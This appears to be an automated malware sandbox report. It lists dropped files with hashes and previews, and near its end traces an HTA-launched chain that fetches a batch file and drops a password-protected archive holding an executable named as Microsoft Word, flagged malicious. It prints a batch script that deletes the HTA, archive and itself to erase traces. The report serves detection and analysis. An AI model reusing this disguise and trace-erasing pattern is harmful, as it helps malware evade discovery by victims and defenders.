SHA1:	16E553F616EBCCE3C29CF07C26C81C7F9C4EE20A
SHA-256:	F0A0156E33AE2DCAA2CDA4787F7121E6FEDE6F27F3CC9788C25281AD5E074411
SHA-512:	14ADFA92C8B4A17F430B7A1DB42D7213775C2BCDE976AC068A1F1E4F6F4D334F2F93CDB573B3D89502C4782991ECD4CD8AC36B8CCA45D622EFE921543C8A9146
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.7./.0.1./.2.0.2.5. . .1.6.:.3.3.:.1.0. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aygkeaxi.dbh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2fx3eg0.5vx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkzunfq0.syw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_euqme2q4.1l3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpswwwbz.c5b.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1hxihgz.vdi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhobw1nx.iau.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ze4ho0cl.lxm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91d11wjh_1p7xl38_5zk.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
Category:	dropped
Size (bytes):	144514
Entropy (8bit):	7.992637131260696
Encrypted:	true
SSDEEP:	3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
MD5:	BA1716D4FB435DA6C47CE77E3667E6A8
SHA1:	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
SHA-256:	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
SHA-512:	65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
Malicious:	false
Preview:	PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..\|....,.A.....Z..a<.C._..../G\|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.\|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r\|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?\|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-07 16-33-04-093.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.345946398610936
Encrypted:	false
SSDEEP:	384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
MD5:	8947C10F5AB6CFFFAE64BCA79B5A0BE3
SHA1:	70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
SHA-256:	4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
SHA-512:	B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
Malicious:	false
Preview:	SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.366157949090496
Encrypted:	false
SSDEEP:	384:o3uw6wNwqw6wpwI3wVwAw4wjwTw1awkw1RSRTwtwbwlbKb6bvbybgNGxGtGTIPJR:oePCnlY93QHNw4QaVeEFegEO272AEUmG
MD5:	0EDEFF90BF8CC0830D0EBF048B797E40
SHA1:	CDDB4650BCE911083E22AA13529D3B7AE5E79281
SHA-256:	49F64409CB4910522B4857717A580F240DA23FEF4F11FB3E1F72517A372C8FBC
SHA-512:	0EF0D4ED289051E2C9A927945A1D035D95A492DB5D3EE1006F4158400291069E91FCEB993BD437B7096A5010033F9E531374B1BB03734D748EC78DDD273A88C0
Malicious:	false
Preview:	SessionID=1629936e-bcb8-468a-a404-78053f28c043.1736285584121 Timestamp=2025-01-07T16:33:04:121-0500 ThreadID=3752 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=1629936e-bcb8-468a-a404-78053f28c043.1736285584121 Timestamp=2025-01-07T16:33:04:122-0500 ThreadID=3752 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=1629936e-bcb8-468a-a404-78053f28c043.1736285584121 Timestamp=2025-01-07T16:33:04:122-0500 ThreadID=3752 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=1629936e-bcb8-468a-a404-78053f28c043.1736285584121 Timestamp=2025-01-07T16:33:04:122-0500 ThreadID=3752 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=1629936e-bcb8-468a-a404-78053f28c043.1736285584121 Timestamp=2025-01-07T16:33:04:122-0500 ThreadID=3752 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.385659949009736
Encrypted:	false
SSDEEP:	768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rK:O
MD5:	93F23ECD1E4EF372C2B8E9DB190B9304
SHA1:	78AF2214C9577239F9AC13596A4B7C864CE45A65
SHA-256:	202F0BF5D4F799FB7A9213C038ED22A404E652A339CAB52C5E3A4D2B34F22A91
SHA-512:	3D0E556B868E965AA65AB01445CF356C573FE076C4DE4E21B0BE7CE305D0C14D30B131AF9FFC19155295EF3B9D7199A8DFC7F60577B3B3BAB93A832FF6802A6B
Malicious:	false
Preview:	03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : *************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***********************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\1a4f221d-633c-4f64-90ec-80080798d157.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\4232f7a4-4159-492e-8545-517e3ee71d3b.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\83679055-cf37-467e-a9c8-a90dbf6abdc4.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
MD5:	CA6B0D9F8DDC295DACE8157B69CA7CF6
SHA1:	6299B4A49AB28786E7BF75E1481D8011E6022AF4
SHA-256:	A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
SHA-512:	9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\ed59e2af-72c3-47ec-abef-6180143eb5af.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
MD5:	8B9FA2EC5118087D19CFDB20DA7C4C26
SHA1:	E32D6A1829B18717EF1455B73E88D36E0410EF93
SHA-256:	4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
SHA-512:	662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\cleanup.bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	123
Entropy (8bit):	4.743980843348089
Encrypted:	false
SSDEEP:	3:mKDDCMN2RuXcov2lOt+WfWBKEuB8yAL/VLYzLr5+VovuxVz4y:hWK2vo+cwv8EhL/VLULdqo2xr
MD5:	F499EEC2ED267670E37C9B9E95939756
SHA1:	32ED7465C5B0C93ACBB4E19369EB4114A55D6B2A
SHA-256:	31C66BC2D0699E4443ADD0A4F3E0C90AD3883CEA19B1AE55EE9C717BF9B664A0
SHA-512:	A931A7C75AB7665603F1BBD81A443D50B79F3E7B2A244D3C4D3277246E00FE40332526D6CF52BE3F32B1294B9BC5476511431D1A819BEE063ECA80330FF991EC
Malicious:	false
Preview:	@echo off..timeout /t 10 >nul..del "C:\Users\user\Desktop\downloaded.hta"..del temp.bat..del msword.zip..del cleanup.bat..

C:\Users\user\AppData\Local\Temp\download_log.txt

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	120
Entropy (8bit):	4.514369106333414
Encrypted:	false
SSDEEP:	3:jLtzKsTGN8cVzKjA2AGN8+1lg+uZDt+kiE2J5xAIhMn:3tzKAGN8OzKjANGN8QgNNwkn23fhM
MD5:	D9CAF7EC781CEA5E2621CD6BC7494BFA
SHA1:	4C169D953752343B7D15A151EEC60572068E95B5
SHA-256:	8B935EAF174C50ECD0B4863F74817634B97D1369E6A7AD3DFAC67A42BDE1BD68
SHA-512:	CA168B9186E26732C0B635CE0F262CC4B3149517AAA5A7486A89C9E953AFF9494DADDB3A8FA1648998083F9FB48A02A04343FD6A98C963E52724B066AB281DCF
Malicious:	false
Preview:	Download started successfully...Download completed successfully and saved to: C:\Users\user\AppData\Local\Temp\temp.bat

C:\Users\user\AppData\Local\Temp\msword.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1324991
Entropy (8bit):	7.999850291445538
Encrypted:	true
SSDEEP:	24576:3GE/EYE2lCGyTYWHD70C3seYPM5pEpHj0uRPSAozSpQiquSI/nB3Z:3GE/by0WHf3sPM5pEdN6ABxSIvBJ
MD5:	D23701F1B135824FC197C9DF144016B8
SHA1:	B6B6BC6012FF74C65C07482E9E60E2A0DAD5104F
SHA-256:	FF637311786E38C53EE1656A4306D7B9B6F776A260D2C89DA5F80FE28E5CD86B
SHA-512:	34AD7BDCA56109D3354FED00591141A8186E14468E274F6A4FACF09130EB0AF0784548D5AEADF5FA341A5BEB1046D9FCA8C7C43B319B4858486EAE509C8A3FD1
Malicious:	true
Preview:	PK........0a'Z.............. .msword.exeux.............UT.....}gJ.}g7.}g.{\|T..?~..dI6.".F..!(...M\..rB.Y\Xw..pQ..+.M....%n........OM..mm...... .J-....T.QW.a.......!.......^.g..<..s..g..m...A.............o....^..0.O.....t.....Uu+.[rO.KV.X)..QST..(Z.......=+..L....6.........t..1.4.=........K...R+{.b...\.&.(.U.La.....i..c....x.g..tA.P.'.....7.B......?'C.a...if.N#.9.c.o....V.C..gg../...=...Y..!..r.........D.f...o.1...Z..S$..'.-]"/..;.6.>....\|..g".&l...."0......M\adt...$....6....N..N....x>.5...,_..."..t..6..o.?.........H.H..!..o..)......{`.L!Zi..SW.b..7......h............G.)R.+DE{L<...C....$.ud.....I..s./........q^..\|.e.'....x.......i.../..8..j.v\|W.H..J./..y\|..E'+.~...cb./.M...h/"&.>..!...O."]...GD.Z.96..u=r.<]..WO..P......`..B..1"..Q...z......Bz...X]..y...R.r....R.o....k....\|=..E.]m......bk..\|.o/{.....j...0.`(.-.KwO....r..e{.{..d..v.l.......Q.\|K...(..kw*9._]..\|`r.5ZP.AEx.uo.h..+...9j....v.....(..Zas..E....f.^..Y......tw...em....6...

C:\Users\user\AppData\Local\Temp\msword\msword.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1352687
Entropy (8bit):	7.984766382677909
Encrypted:	false
SSDEEP:	24576:jdh/TQ8lCGwfae/DdysbyC6PW//Epzjuc/9c+OzERQqq0GIxJBo:RwSe/fby9W//EpBe+BxGIfBo
MD5:	90B82696A0A9DE2974B4BD90C61EC6ED
SHA1:	4CD1594C2BED1D86BDF0EBCDF2E637E969D2A69F
SHA-256:	E3557AC466DC7D953A4675C86006AE441B2D0986D24A9736938EE9B4D03FFA04
